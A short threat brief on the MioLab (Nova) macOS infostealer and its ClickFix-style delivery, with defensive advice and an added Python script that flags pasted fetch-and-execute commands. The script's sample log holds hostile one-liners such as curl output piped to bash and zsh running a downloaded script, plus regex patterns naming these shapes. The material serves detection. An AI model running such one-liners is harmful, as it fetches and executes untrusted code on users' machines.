MioLab macOS Stealer Expands With ClickFix Delivery and Wallet Theft Capabilities

What happened

A sophisticated macOS infostealer known as MioLab (also tracked as Nova) has emerged as a malware-as-a-service (MaaS) platform, expanding its capabilities to include ClickFix-style delivery, cryptocurrency wallet theft, and team-based attack tooling. Researchers said the malware is being actively developed and distributed through underground forums, with features designed to steal data from browsers, password managers, and crypto wallets while providing operators with centralized control panels. The latest campaigns use social engineering techniques to trick users into executing malicious code, reflecting a broader shift toward fileless and user-driven infection methods targeting macOS systems. 

Who is affected

macOS users are affected, particularly those who install untrusted software or interact with social engineering lures that prompt them to execute commands or download malicious payloads. 

Why CISOs should care

The emergence of MioLab highlights how macOS is increasingly targeted by advanced infostealers, especially as attackers focus on high-value users such as developers, executives, and cryptocurrency holders. 

3 practical actions

  1. Restrict execution of untrusted scripts and installers. Prevent users from running unknown Terminal commands or unsigned applications. 
  2. Monitor for ClickFix-style social engineering. Watch for prompts that trick users into copying and executing commands. 
  3. Protect browser and wallet data. Implement controls to detect and prevent credential and cryptocurrency theft. 
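To illustrate action 2, here is an added example (not part of the original report and not derived from MioLab indicators) that flags Terminal-launched command lines which fetch or decode content and pass it straight to an interpreter. The log layout (timestamp, user, parent process, command), the rule set, the terminal list, and all sample events are assumptions constructed for this example.

```python
import re

# Interpreters that a pasted one-liner typically hands fetched content to.
INTERP = r"(?:(?:ba|z|da|k)?sh|python3?|perl|ruby|osascript)"

# Generic fetch-or-decode-then-execute shapes (assumed heuristics for this
# example; they are not indicators taken from MioLab reporting).
RULES = [
    ("download piped to interpreter",
     re.compile(rf"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?{INTERP}\b")),
    ("decoded blob piped to interpreter",
     re.compile(rf"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?{INTERP}\b")),
    ("download executed via command substitution",  # \x22 and \x27 are the quote chars
     re.compile(rf"\b{INTERP}\s+-c\s+[\x22\x27]?\$\(\s*(?:curl|wget)\b")),
]

# ClickFix relies on the user pasting into an interactive terminal, so only
# commands whose parent is a terminal app are scored (assumed app names).
TERMINALS = {"Terminal", "iTerm2"}

# Constructed process events: "<timestamp> <user> <parent> <command line>"
SAMPLE_EVENTS = """\
2025-01-01T10:00:01Z alice Terminal curl -fsSL https://example.invalid/verify.sh | bash
2025-01-01T10:00:05Z alice Terminal echo Y29uc3RydWN0ZWQ= | base64 -D | sh
2025-01-01T10:02:11Z bob Terminal curl -O https://example.invalid/report.pdf
2025-01-01T10:03:40Z carol Terminal curl -s https://example.invalid/data.json | shasum -a 256
2025-01-01T10:04:02Z dave iTerm2 zsh -c "$(curl -fsSL https://example.invalid/fix)"
2025-01-01T10:05:30Z build launchd curl -fsSL https://example.invalid/bootstrap.sh | sh
"""

def classify(command):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES if rx.search(command)]

def scan(log_text):
    """Return (timestamp, user, reasons) for suspicious terminal-launched commands."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 4 or parts[2] not in TERMINALS:
            continue  # malformed line, or not typed/pasted into a terminal
        reasons = classify(parts[3])
        if reasons:
            hits.append((parts[0], parts[1], reasons))
    return hits

if __name__ == "__main__":
    for ts, user, reasons in scan(SAMPLE_EVENTS):
        print(ts, user, "; ".join(reasons))
```

Legitimate installers use the same command shapes, so treat hits as triage leads and pair the rules with an allowlist of approved download hosts.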
